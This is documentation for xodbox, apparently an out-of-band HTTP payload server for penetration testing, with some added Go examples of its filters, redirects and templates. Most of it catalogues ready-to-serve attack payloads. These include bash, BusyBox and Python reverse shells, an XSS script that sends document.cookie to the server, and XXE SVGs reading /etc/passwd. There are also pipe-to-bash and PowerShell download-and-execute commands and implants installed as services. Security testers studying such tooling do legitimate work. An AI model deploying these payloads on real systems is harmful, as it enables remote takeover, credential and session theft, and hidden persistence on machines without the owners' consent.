HTTPX
HTTPX Handler
Purpose
Speak HTTP to other computers you may or may not control….
Configuration
| Key | Values |
|---|---|
| handler | Must be HTTPX |
| listener | Default :80 |
| static_dir | Directory to host static files from |
| payload_dir | Directory to import payloads from |
| acme_email | Email to use for your ACME account |
| acme_accept | A dumb way to force you to ensure you agree to the ACME provider's (most likely Let's Encrypt) TOS |
| acme_url | https://acme-staging-v02.api.letsencrypt.org/directory, https://acme-v02.api.letsencrypt.org/directory, or one of these: Certmagic acmeissuer.go |
| tls_names | Comma-separated list of your domains to get TLS certificates for. I had to do wildcards first, not sure if that was a staging or DNS provider issue. |
| dns_provider | Currently, namecheap or route53, but we can support anything libdns supports… |
| dns_provider_api_user | Username for API calls. Only used for namecheap ATM. |
| dns_provider_api_key | Key for API calls. Only used for namecheap ATM. |
| mdaas_log_level | Log level for MDaaS binaries. Possible values: NONE, INFO, WARN, ERROR, DEBUG |
| mdaas_bind_listener | Listener for MDaaS binaries. |
| mdaas_allowed_cidr | CIDRs allowed to connect to MDaaS binaries |
| mdaas_notify_url | Webhook URL for notifying success or error |
| api_path | API path |
Filters
The entire HTTP request is used to match filters. To alert on a specific prefix the following filter would be used.
"(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix"
This would match:
And would not match:
Things are still being created, documented, and fine-tuned.
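The following is an added example, not code from the xodbox project, showing how the documented filter behaves when it is run against the whole raw request as the text above describes. The five raw requests are constructed for the example, and the anchored variant (`^` on the request line) is an assumption of this example, not a documented project option; it is included because the unanchored pattern also fires on a request whose body happens to contain the method-and-prefix string, which matters when a filter is meant to alert precisely.

```go
package main

import (
	"fmt"
	"regexp"
)

// docsFilter is the pattern from the Filters section, matched against the
// entire raw HTTP request. anchoredFilter is an assumed variant that only
// fires when the prefix is on the request line itself.
var (
	docsFilter     = regexp.MustCompile(`(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix`)
	anchoredFilter = regexp.MustCompile(`^(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix`)
)

// samples are constructed raw requests, not captured traffic.
var samples = map[string]string{
	"prefix-get":     "GET /myPrefix/anything HTTP/1.1\r\nHost: xodbox.test\r\n\r\n",
	"prefix-post":    "POST /myPrefix?x=1 HTTP/1.1\r\nHost: xodbox.test\r\nContent-Length: 0\r\n\r\n",
	"other-path":     "GET /other/path HTTP/1.1\r\nHost: xodbox.test\r\n\r\n",
	"options-method": "OPTIONS /myPrefix HTTP/1.1\r\nHost: xodbox.test\r\n\r\n",
	// The prefix string appears only in the body; the request line is /submit.
	"prefix-in-body": "POST /submit HTTP/1.1\r\nHost: xodbox.test\r\nContent-Length: 17\r\n\r\nGET /myPrefix fav",
}

// MatchesFilter reports whether the documented filter fires on the raw request.
func MatchesFilter(raw string) bool { return docsFilter.MatchString(raw) }

// MatchesAnchored reports whether the request-line-anchored variant fires.
func MatchesAnchored(raw string) bool { return anchoredFilter.MatchString(raw) }

func main() {
	for name, raw := range samples {
		fmt.Printf("%-15s docs=%-5v anchored=%v\n", name, MatchesFilter(raw), MatchesAnchored(raw))
	}
}
```

Running it shows the documented pattern firing on the two genuine `/myPrefix` requests, staying quiet on `/other/path` and on the `OPTIONS` method (which is not in the alternation), and also firing on the request whose body merely contains the string; only the anchored variant separates that last case.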
New Features
Legacy Functionality to be implemented.
Legacy functionality that isn't specific to a handler
1 - Default Payloads Seeds
seed data
Default payloads that come with xodbox.
1.1 - Default Header
Adds the default header to all HTTP responses.
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
Server: BreakfastBot/1.0.0
1.2 - Redirect
HTTP Redirects
HTTP Redirects to the query parameter l using the query param s as the status code.
| What | Description | GET Parameter |
|---|---|---|
| Location | Location to redirect to | l |
| Status | HTTP status code | s |
Example Request
curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"
Example Response
Location: https://github.com/defektive/xodbox
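The handler below is an added example, not xodbox's own implementation, of the redirect behaviour documented above: `l` becomes the `Location` header and `s` the status code. Two details are assumptions of this example rather than documented project behaviour: `s` defaults to 302 when absent, and only 3xx values are accepted. The range check matters in Go because `WriteHeader` panics on codes outside 100-999, so an unchecked `s` lets a single request crash the handler. The `/redir` route and the `:8080` listener in `main` are also assumed for the example.

```go
package main

import (
	"log"
	"net/http"
	"strconv"
)

// RedirectHandler redirects to the l query parameter using s as the status
// code. The 302 default and the 3xx-only check are assumptions of this example.
func RedirectHandler(w http.ResponseWriter, r *http.Request) {
	q := r.URL.Query()
	location := q.Get("l")
	if location == "" {
		http.Error(w, "missing l parameter", http.StatusBadRequest)
		return
	}

	status := http.StatusFound // assumed default when s is not supplied
	if s := q.Get("s"); s != "" {
		n, err := strconv.Atoi(s)
		// Only 3xx codes make sense with a Location header, and codes outside
		// 100-999 would panic inside WriteHeader, so reject everything else.
		if err != nil || n < 300 || n > 399 {
			http.Error(w, "s must be a 3xx status code", http.StatusBadRequest)
			return
		}
		status = n
	}

	// For an out-of-band server the hit itself is the signal, so log it.
	log.Printf("redirect %s -> %s (%d) from %s", r.URL.Path, location, status, r.RemoteAddr)
	http.Redirect(w, r, location, status)
}

func main() {
	http.HandleFunc("/redir", RedirectHandler) // route name assumed for the example
	log.Fatal(http.ListenAndServe(":8080", nil))
}
```

With the documented request `curl -i "http://localhost:8080/redir?l=https://github.com/defektive/xodbox&s=301"` the response carries `Location: https://github.com/defektive/xodbox` with status 301; `s=999`, a non-numeric `s`, or a missing `l` produce a 400 instead of a panic.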
1.3 - Remote Address Reflector
Remote address reflector
Returns the requesting client's remote IP address.
Example Request
curl http://xodbox.test/ip
Example Response
1.4 - Robots TXT
A restrictive robots.txt
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/robots.txt
Example Response
User-Agent: *
Disallow: /
1.5 - Build MDaaS
Build random binaries
1.6 - Inspect
Reflect back HTTP requests in various formats
Depends on an internal code
/inspect
Inspect or reflect the request back in various formats.
Examples
- http://localhost/inspect
- http://localhost/some/random/path/inspect.gif
1.7 - XSS HTML
Returns HTML that embeds xss-js
/jsc.html
Simple HTML to load simple JS Payload.
1.8 - XSS JavaScript
Returns JS that embeds an image back to xodbox
/jsc
Simple JS payload. Useful for embedding, or for quickly copying and modifying into an XSS payload to prove execution and exfil.

```javascript
(function () {
  var s = document.createElement("img");
  document.body.appendChild(s);
  s.src = "//{{.Request.Host}}/{{ .NotifyString}}/jscb?src=" + window.location + "&c=" + document.cookie;
})()
```
1.9 - Default Favicon
Redirects to the default logo.
Redirects to the embedded default logo, exposed via embedded fs.
Example Request
curl -i http://xodbox.test/favicon.ico
1.10 - Bash Reverse Shell
Bash Reverse Shell
Useful for reverse shells on systems with bash (uses /dev/tcp).
Example Request
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/bash?h=10.10.10.10&p=9090"
Example Response
```bash
bash -i >& /dev/tcp/127.0.0.1/9091 0>&1
0<&196;exec 196<>/dev/tcp/127.0.0.1/9091 ; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/127.0.0.1/9091 0<&1 2>&1
```
1.11 - Bind Shell
Requires bind-shell in static dir
Build a bind shell implant for the specific platform and execute it.
Example Request
1.12 - BusyBox Reverse Shell
BusyBox Reverse Shell
Useful for reverse shells on busybox systems.
Example Request
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/bb?h=10.10.10.10&p=9090"
Example Response
```bash
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1111 >/tmp/f
```
1.13 - Detect platform
detect platform
Example Request
curl -i "http://xodbox.test/detect.sh"
This will curl the notification URL with the detected values in the path.
1.14 - HTML IFrame With Request Params
Returns an HTML page with an iframe src to f query parameter
/ht
Attempts to fetch whatever file is supplied via the f query parameter.
1.15 - Open Graph
Embed request params in open graph elements.
Useful for unfurlers. Maybe we should merge this into inspect…
Example Request
curl -i "http://xodbox.test/unfurl"
Example Response
Location: https://github.com/defektive/xodbox
1.16 - Python Reverse Shell
Python Reverse Shell
Useful for reverse shells on systems with Python available.
Example Request
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/python?h=10.10.10.10&p=9090"
Example Response
```python
import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",9091));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")
```
1.17 - Reverse Shell
Requires bind-shell in static dir
Build a reverse shell implant for the specific platform and execute it.
Example Request
curl xodbox/reverse.sh|bash
1.18 - Simple SSH
Simple SSH (requires build of simple ssh server in static dir)
Build an SSH server implant for the specific platform and execute it.
Example Request
1.19 - Simple SSH Service
Simple SSH Service (requires build of simple ssh server in static dir)
Build an SSH server implant for the specific platform and install it as a service, then start the service.
Example Request
1.20 - XSS Image Template
A text template for quickly embedding JS execution hooks into pages via image tags.
1.21 - XXE Callback
More XXE
XXE Callback used by xxe-system
1.22 - XXE DTD
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
/evil.dtd
dtd for use by others
1.23 - XXE SVG Hostname
Returns an SVG payload with XXE to get files
/sh
attempts to get /etc/hostname
SVG with XXE payloads
1.24 - XXE SVG Passwd
Returns an SVG payload with XXE to get files
/sp
attempts to get /etc/passwd
1.25 - XXE SVG Request Params
Returns an SVG payload with XXE to get files
/sv
Attempts to fetch whatever file is supplied via the f query parameter.
1.26 - XXE System
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
1.27 - Default Page
returns a simple page if nothing is matched
Returned when no other payload pattern matches the request.
Example Request
curl -i http://xodbox.test/
Example Response
1.28 - In Development Seeds
These seeds are not ready for production and may never be.
Seeds that are not tested or finished.
1.28.1 - Bind shell powershell
Requires bind-shell in static dir
```powershell
iex ((New-Object System.Net.WebClient).DownloadString('http://xodbox/bind.ps1'))
```
1.28.2 - Pipe Process List to Notifier
Simple script to pipe ps to the notification URL
Example Request
1.28.3 - WPAD
Returns a WPAD config file (Javascript).
WPAD Proxy. Not really useful at the moment. Should be more useful in the future
2 - Example Payloads
Examples
Default payloads that come with xodbox.
2.1 - List Payloads
List payloads
List Payloads
```yaml
---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
  headers:
    Content-Type: text/plain
  body: |
    Payloads
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    {{ end }}
---
```
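As an added example, not xodbox's own code, the program below models the List Payloads seed above as a Go struct, checks its `pattern` against request paths, and renders its `body` as a Go text/template over a small constructed catalogue of payloads. The `Seed` and `Payload` types, their field names, and the two catalogue entries are assumptions of this example; the page does not state whether xodbox matches a payload's `pattern` against the request path or the whole request, so the example matches the path only.

```go
package main

import (
	"bytes"
	"fmt"
	"regexp"
	"text/template"
)

// Payload carries the fields the seed body references (.Pattern, .Name,
// .Type, .Description). The type is an assumption of this example.
type Payload struct {
	Name, Description, Pattern, Type string
}

// Seed mirrors the keys in the List Payloads front matter.
type Seed struct {
	Title, Description, Pattern string
	Weight                      int
	IsFinal                     bool
	Headers                     map[string]string
	Body                        string
}

// listBody is the body from the seed above, verbatim.
const listBody = `Payloads
{{ range .Payloads }}
{{ .Pattern }} - {{ .Name }} [{{ .Type }}]
{{ .Description }}
{{ end }}
`

var listSeed = Seed{
	Title: "List Payloads", Description: "List payloads", Weight: 1,
	Pattern: `/i-forgot-how-things-work$`, IsFinal: true,
	Headers: map[string]string{"Content-Type": "text/plain"},
	Body:    listBody,
}

// catalogue is a constructed sample, not the real default seed set.
var catalogue = []Payload{
	{Name: "Default Favicon", Description: "Redirects to the default logo.", Pattern: "/favicon.ico", Type: "redirect"},
	{Name: "Robots TXT", Description: "Simple robots txt to prevent indexing.", Pattern: "/robots.txt", Type: "static"},
}

// Matches reports whether the seed pattern matches a request path. The
// pattern is an unanchored regexp, so the trailing "$" in the seed is what
// stops it from firing on /i-forgot-how-things-work/anything.
func (s Seed) Matches(path string) bool {
	return regexp.MustCompile(s.Pattern).MatchString(path)
}

// Render executes the seed body as a text/template with .Payloads bound.
func (s Seed) Render(payloads []Payload) (string, error) {
	t, err := template.New(s.Title).Parse(s.Body)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, map[string]any{"Payloads": payloads}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	for _, p := range []string{"/i-forgot-how-things-work", "/i-forgot-how-things-work/extra"} {
		fmt.Printf("%s matches=%v\n", p, listSeed.Matches(p))
	}
	out, err := listSeed.Render(catalogue)
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
}
```

Because `is_final` is true, a real dispatcher would stop after this seed once its pattern matches; the example only models the match and the rendered body, with each catalogue entry appearing as `pattern - name [type]` followed by its description.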